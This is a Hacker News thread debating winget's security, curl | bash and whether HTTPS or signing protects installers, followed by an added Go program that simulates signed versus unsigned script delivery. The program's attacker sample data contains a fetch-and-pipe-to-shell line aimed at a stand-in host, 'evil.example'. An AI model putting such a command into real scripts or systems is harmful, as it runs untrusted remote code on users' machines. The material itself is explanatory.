
Microsoft Edit

(github.com)
486 points by ethanpil | 1 comment
ocdtrekkie No.44372923
It'd be nice if they didn't recommend winget for installation though. winget is an egregious security risk that Microsoft has just like pretended follows even minimal security practices, despite just launching four years ago with no protection from bad actors whatsoever and then never implementing any improvements since.
replies(2): >>44372958, >>44373306
dale_huevo No.44373306
winget is just Windows developers' version of curl | bash. Yet another example of Microsoft copying Linux features.
replies(2): >>44373331, >>44376065
ocdtrekkie No.44373331
Except curl | bash definitely executes code by the author controlling the URL you put in, and if the URL is HTTPS, in a reasonably secure fashion.

There is no validation when you winget whether or not the executable is from the official source or that a third party contributor didn't tamper with how it's maintained.

replies(3): >>44373345, >>44373356, >>44373443
dale_huevo No.44373345
If you think HTTPS is performing code validation I have news for you.

HTTPS only guarantees the packets containing the unverified malicious code are not tampered with from the server to you. A server which could very well be compromised and alternate code put in its place.

You are drawing an egregious apples-to-oranges comparison here. Please re-read what you said.

You could serve digitally signed code over plain HTTP and it would be more secure than your example over HTTPS. Unfortunately there are a lot of HTTPS old wives' tales that many misinformed developers believe in.
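The following is an added example, not code from the thread, from Microsoft, or from winget. It models the distinction dale_huevo draws above: HTTPS gives the client integrity from the server to the client, while a signature checked against a publisher key the client already holds gives authenticity of the bytes themselves, independent of how they travelled. The program plays one genuine Ed25519-signed install script through several deliveries (honest server over HTTPS, compromised server over HTTPS, honest server over plain HTTP with and without an on-path rewrite) and reports what two client policies would execute: the curl | bash policy of running whatever arrived, and a verify-then-run policy that only executes bytes the pinned key signed. The key pairs, scripts and the evil.example hostname are constructed sample data; the "compromised server" and "body rewritten" cases are simulated by handing the client tampered bytes directly, not by real network traffic.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"errors"
	"fmt"
)

// Release is what a download server hands out: the install script plus a
// detached signature the publisher made over those exact bytes.
type Release struct {
	Script, Sig []byte
}

// Publisher holds the signing key. Only the real author has the private half;
// the client pins the public half obtained out of band (project docs, a key
// shipped with an earlier version), never from the server it is about to trust.
type Publisher struct {
	Pub  ed25519.PublicKey
	priv ed25519.PrivateKey
}

func NewPublisher() Publisher {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err) // no usable entropy; nothing sensible to do in an example
	}
	return Publisher{Pub: pub, priv: priv}
}

func (p Publisher) Sign(script []byte) Release {
	return Release{Script: script, Sig: ed25519.Sign(p.priv, script)}
}

var ErrBadSignature = errors.New("signature does not verify against the pinned publisher key")

// VerifyRelease is the client-side check. It depends only on the bytes and the
// pinned key, not on whether they came over HTTPS, plain HTTP or a USB stick.
func VerifyRelease(pinned ed25519.PublicKey, r Release) error {
	if len(pinned) != ed25519.PublicKeySize || len(r.Sig) != ed25519.SignatureSize ||
		!ed25519.Verify(pinned, r.Script, r.Sig) {
		return ErrBadSignature
	}
	return nil
}

// Outcome records whose code each client policy would end up executing:
// "author", "attacker" or "nothing".
type Outcome struct {
	CurlBash      string // trust the channel: run whatever arrived
	VerifyThenRun string // trust the publisher: run only what the pinned key signed
}

func label(script, author []byte) string {
	switch {
	case script == nil:
		return "nothing"
	case bytes.Equal(script, author):
		return "author"
	}
	return "attacker"
}

// RunScenarios delivers one genuine release several ways and reports what each
// policy executes. Scripts, keys and the hostname are constructed sample data.
func RunScenarios() map[string]Outcome {
	author, mallory := NewPublisher(), NewPublisher() // mallory has a key, just not the pinned one
	pinned := author.Pub
	authorScript := []byte("#!/bin/sh\necho 'installing edit'\n")
	attackerScript := []byte("#!/bin/sh\ncurl -s http://evil.example/p | sh\n")
	genuine := author.Sign(authorScript)
	// An on-path attacker on plain HTTP appends a line to the genuine script.
	appended := append(append([]byte{}, authorScript...), "curl -s http://evil.example/p | sh\n"...)

	// HTTPS guarantees the client sees exactly what the server sent; it cannot
	// tell an honest server from a compromised one. Plain HTTP lets an on-path
	// attacker rewrite the body, so the signature has to carry all the trust.
	deliveries := map[string]Release{
		"https, honest server":                       genuine,
		"https, compromised server, attacker-signed": mallory.Sign(attackerScript),
		"https, compromised server, stale sig":       {Script: attackerScript, Sig: genuine.Sig},
		"http, honest server, untouched in flight":   genuine,
		"http, honest server, body rewritten":        {Script: appended, Sig: genuine.Sig},
	}
	out := make(map[string]Outcome, len(deliveries))
	for name, r := range deliveries {
		var verified []byte // nil means the verify-then-run client refused to execute
		if VerifyRelease(pinned, r) == nil {
			verified = r.Script
		}
		out[name] = Outcome{CurlBash: label(r.Script, authorScript), VerifyThenRun: label(verified, authorScript)}
	}
	return out
}

func main() {
	for name, o := range RunScenarios() {
		fmt.Printf("%-45s curl|bash runs: %-9s verify-then-run runs: %s\n", name, o.CurlBash, o.VerifyThenRun)
	}
}
```

The two rows to compare are "https, compromised server" and "http, honest server, untouched in flight": the channel-trusting client runs the attacker's bytes in the first case and the signature-checking client runs the author's bytes in the second, which is exactly the claim that signed code over plain HTTP beats unsigned code over HTTPS. All of the trust sits in how the client got the pinned key in the first place; a package manager that fetches the key, or an equivalent pinned hash, from the same place it fetches the installer has re-created the curl | bash problem one level up.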